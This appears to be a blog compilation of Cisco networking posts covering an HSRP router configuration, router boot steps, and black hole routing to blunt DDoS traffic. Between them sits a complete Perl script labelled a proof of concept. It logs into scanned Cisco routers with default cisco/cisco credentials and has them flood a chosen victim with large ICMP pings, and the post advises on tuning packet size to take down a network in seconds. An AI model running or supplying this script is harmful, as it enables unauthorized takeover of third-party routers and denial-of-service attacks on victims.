HSRP simple example

Let’s talk about too routers A and B that use the HSRP protocole against tolerance fault and attack.

The router A use the IP address 192.168.0.2 with a mask 255.255.255.0
The router B use the IP address 192.168.0.3 with a mask 255.255.255.0

So, the virtual IP address is 192.168.0.1 and is set as default gateway as:

Router A
interface Ethernet 0/0
ip address 192.168.0.2 255.255.255.0
standby 10 priority 100 preempt
standby 10 ip 192.168.0.1

Router B
interface Ethernet 0/0
ip address 192.168.0.3 255.255.255.0
standby 10 priority 80
standby 10 ip 192.168.0.1

Advertisements

DDOS based on ICMP echo request

Prof of concept of a simple DDOS program based on ICMP echo request from cisco routers.
With mass scanner you can get an important list of cisco default install
and by looking to their MTU and throughtput, you may tune the ICMP size to DOS a big network in few seconds
the program is informational only, please keep it on this way

#!/usr/bin/perl
use Parallel::ForkManager;
use Net::Telnet();
use Net::Telnet::Cisco;
use strict;

sub usage {
print “\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n”;
exit;
}

my $victim = $ARGV[0];
my $file = $ARGV[1];

if ((!$victim) or (!$file)) {
usage;
}

my $login = “cisco”;
my $passwd = “cisco”;
my $enable = “cisco”;
my $mtu = 1500;
my $cmd = “ping “.$victim.” size 1500 df-bit repeat 1000″;

open FILE, “<$file” or die $!;
my $pm = new Parallel::ForkManager(100);
for (1..1000) {
while () {
$pm->start and next;
my $host = $_;
my $session = Net::Telnet::Cisco->new(Host => $host);
$session->login($login, $passwd);
$session->enable($enable);
$session->cmd($cmd);
$pm->finish; ## end point of the parallel process
}
}
$pm->wait_all_children; ## wait for the child processes

What Happens As Your Router Boots Up

What Happens As Your Router Boots Up

1. The “Power-On Self-Test” checks the Router Hardware.
This includes the CPU (Central Processor Unit), memory, and interfaces.
2. The “Bootstrap Program”, which is stored in ROM, runs itself
3. The “Bootfield” is read to find out the proper Operating System source.
4. The “Operating System Image” is loaded into RAM. (Random Access Memory)
5. The “Configuration File” saved in NVRAM is loaded into the RAM.
The Configuration File is then executed one line at a time.
6. If no “Configuration File” is found in NVRAM,
the Cisco IOS will offer you the chance to use the “Initial Configuration Dialog”.
This is a set of Questions for you to answer to do a basic configuration.
Since in our theoretical New Router there is no NVRAM configuration
This “Setup Dialog” will be one of the first things we see.

Stop DDOS attacks on a cisco router

ISPs have other options available that depend on routing changes, such as black hole filtering. Black hole filtering works by forwarding malicious traffic to an imaginary interface known as Null0 – similar to /dev/null on Unix machines. Since it’s not a valid interface, traffic routed to Null0 is essentially dropped. Moreover, this technique minimizes performance impact – a useful feature during the DDoS investigation so the rest of the network remains stable under the heavy load.

Here’s the simplest form of a black hole route:

Router(config)# int null0
Router(config-if)# no ip unreachable
Router(config)# ip route 1.1.1.1 255.255.255.0 null0

This statement sends all traffic arriving on this router to the null0 interface — in effect, discarding it and sending it to the black hole.

You could also redistribute this route into your dynamic routing protocol and have it sent to all other routers on your network. Then, all routers would send traffic to your router, and your router would drop that traffic.

Using ISP back hole you could limit some bad traffic, imagine that the target IP for the DDOS is 1.2.3.4 and my AS is 1234. The transit provider is 1000 and he blackhole community is tagged with 666.

On a cisco router I may use the following to blackhole the traffic before the
traffic enter my network.

router bgp 1234
bgp router-id 1.2.3.4
redistribute static route-map static-to-bgp
..
..
!
route-map static-to-bgp permit 5
match tag 666
set community 1000:666 additive
!